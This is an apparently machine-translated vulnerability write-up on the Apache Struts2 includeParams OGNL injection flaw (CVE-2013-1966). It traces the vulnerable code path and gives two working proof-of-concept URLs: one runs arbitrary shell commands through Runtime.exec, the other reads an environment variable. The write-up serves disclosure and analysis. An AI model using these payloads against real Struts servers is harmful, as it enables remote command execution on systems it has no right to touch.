Struts2 includeParams attribute Command Execution Vulnerability

CVE-2013-1966 description:

The <s: a> and <s: url> tags of Apache Struts2 both provide the includeParams attribute. Values allowed for this attribute include none, get, and all. When this attribute is set to get or all, Apache Struts2 executes the parameter value submitted by the user as an Ognl expression. Attackers can submit malicious ONGL expressions to execute arbitrary Java code. As long as the url/a tag is used in JSP code developed based on Apache Struts2 and the includeParams attribute is set to all or get, remote attackers can exploit this vulnerability to execute arbitrary commands.

Impact:

Affected Versions: Apache Struts 2.0.0-Apache Struts 2.3.14.1

Analysis:

The main reason is that the passed parameters are parsed and executed by OGNL in Struts2.

The parseQueryString method in package org. apache. struts2.views. uti. DefaultUrlHelper is as follows:

Public Map <String, Object> parseQueryString (String queryString, boolean forceValueArray) {Map <String, Object> queryParams = new LinkedHashMap <String, Object> (); if (queryString! = Null) {... if (paramName! = Null) {paramName = translateAndDecode (paramName); String translatedParamValue = translateAndDecode (paramValue );......} // translateAndDecode will call private String translateVariable (String input) {ValueStack valueStack = ServletActionContext. getContext (). getValueStack (); return TextParseUtil. translateVariables (input, valueStack );}

 

Finally, TextParseUtil. translateVariables () is parsed and executed by OGNL. Refer to the official reference documentation. The method is described as follows:

Public static String translateVariables (String expression, ValueStack stack)
Converts all instances of $ {...} In expression to the value returned by a call to ValueStack. findValue (java. lang. string ). if an item cannot be found on the stack (null is returned), then the entire variable $ {...} Is not displayed, just as if the item was on the stack but returned an empty string.
Parameters:
Expression-an expression that hasn' t yet been translated
Returns:
The parsed expression

So construct a parameter with $ {...} Contains specific OGNL commands to execute arbitrary commands.

POC:

http://localhost:8008/StrutsTest/login.jsp?a=1${%23_memberAccess[%22allowStaticMethodAccess%22]=true,%23req=@org.apache.struts2.ServletActionContext@getRequest(),%23exec=@java.lang.Runtime@getRuntime().exec(%23req.getParameter(%22cmd%22)),%23iswinreader=new%20java.io.DataInputStream(%23exec.getInputStream()),%23buffer=new%20byte[1000],%23iswinreader.readFully(%23buffer),%23result=new%20java.lang.String(%23buffer),%23response=@org.apache.struts2.ServletActionContext@getResponse(),%23response.getWriter().println(%22$S\n%22),%23response.getWriter().println(%23result),%23response.getWriter().println(%22$E\n%22),%23response.close()}&cmd=cmd%20/c%20netstat

The special characters of the OGNL command must be encoded.
In the ognlcode, call runtime.exe c () to execute the command.

The echo of the Command executed by the POC is as follows:

The preceding Code reads echo data using the readFully (byte []) method of the DataInputStream class. ReadFully (byte [] B) method reads the byte array with the specified length on the stream. That is to say, if the byte array with the length of len is declared, readFully (byte [len] B) the method is returned only when the len Length is read. Otherwise, it is blocked and waits. If it times out, an exception EOFException is thrown. Therefore, when the echo content is longer than the defined length of the received byte array, it will be blocked, leading to an exception. You can shorten the length of the received byte array to solve this problem. In addition, the read (byte []) of the DataInputStream class can also read data. This method actually reads the bytes in the stream until there are no bytes in the stream, if the declared byte array length is greater than the data length in the stream, it is returned in advance. However, because data is sent in segments during network upload or transmission, the read () method will not receive complete data. POC2:

http://localhost:8080/StrutsTest/login.jsp?a=1${%23_memberAccess[%22allowStaticMethodAccess%22]=true,%23u=@java.lang.System@getenv(“USERNAME”),@org.apache.struts2.ServletActionContext@getResponse().getWriter().println(%23u)}

References:

OGNL: http://commons.apache.org/proper/commons-ognl/
Struts API: http://struts.apache.org/release/2.0.x/struts2-core/apidocs/
Vulnerability Analysis: http://www.bkjia.com/Article/201305/213319.html